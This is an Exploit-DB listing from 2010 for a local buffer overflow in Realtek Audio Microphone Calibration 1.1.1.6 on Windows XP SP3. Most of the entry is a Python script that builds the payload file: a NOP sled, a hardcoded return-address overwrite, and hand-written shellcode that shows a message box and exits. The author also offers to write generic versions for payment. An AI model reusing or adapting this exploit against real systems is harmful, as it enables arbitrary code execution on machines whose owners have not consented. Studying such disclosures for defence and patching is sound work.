Realtek Audio Microphone Calibration 1.1.1.6 - Local Buffer Overflow

EDB-ID:

15540

CVE:

N/A


Author:

BraniX

Type:

local


Platform:

Windows

Date:

2010-11-14


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition

# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long argument 
# as a startup parameter. Shellcode can by run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)

# Ps. If you need generic exploit ...
# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ 
# we will c0de it for You ^^

filepath = "C:\\ShellCode\\MicCal 1.1.1.6 - Exploit.bin"
f = open(filepath, "wb")

# dummy data
f.write('\x90' * 340)

# overwrite ret
f.write('\xD7\x30\x9D\x7C')
f.write("[BraniX]")
f.write('A' * 8)

# start shellcode
f.write('\x83\xEC\x08')         # sub esp,8
f.write('\x88\x04\x24')         # mov byte ptr [esp], al
f.write('\x83\xEC\x08')         # sub esp,8

f.write('\x54')                 # push esp
f.write('\x5B')                 # pop ebx

f.write('\x50')                 # push eax
f.write('\x53')                 # push ebx
f.write('\x53')                 # push ebx
f.write('\x50')                 # push eax

f.write('\xE8\x35\x08\x27\x7E') # call user32.MessageBoxA
f.write('\x57')                 # push edi

f.write('\xE8\x57\xCB\x6E\x7C') # call kernel32.ExitProcess

f.write('\xCC' * 10)            # int 3's

f.close()

print "Done ..."